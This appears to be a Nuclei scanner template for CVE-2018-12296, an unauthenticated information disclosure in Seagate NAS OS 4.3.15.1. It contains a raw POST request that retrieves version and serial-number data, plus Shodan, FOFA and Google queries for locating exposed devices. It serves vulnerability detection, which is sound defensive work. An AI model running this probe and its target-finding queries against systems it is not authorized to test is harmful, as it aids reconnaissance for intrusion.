id: CVE-2018-12296 info: name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure author: princechaddha severity: high description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. impact: | An attacker can gain sensitive information about the server, potentially leading to further attacks. remediation: | Upgrade to a patched version of Seagate NAS OS. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01442 epss-percentile: 0.866 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: seagate product: nas_os shodan-query: http.title:"seagate nas - seagate" fofa-query: title="seagate nas - seagate" google-query: intitle:"seagate nas - seagate" tags: cve,cve2018,seagate,nasos,disclosure,unauth http: - raw: - | POST /api/external/7.0/system.System.get_infos HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} matchers: - type: word part: body words: - '"version":' - '"serial_number":' condition: and extractors: - type: regex group: 1 regex: - '"version": "([0-9.]+)"' part: body # digest: 4a0a00473045022100c86c7844f9443c6b8d293926410ce41785db4ef5c6b98043f30213d9bbb9270a022070c2af8ad6d2d241e8f1fef3587bcf19840745117be2ff717086e32217b3849f:922c64590222798bb761d5b6d8e72950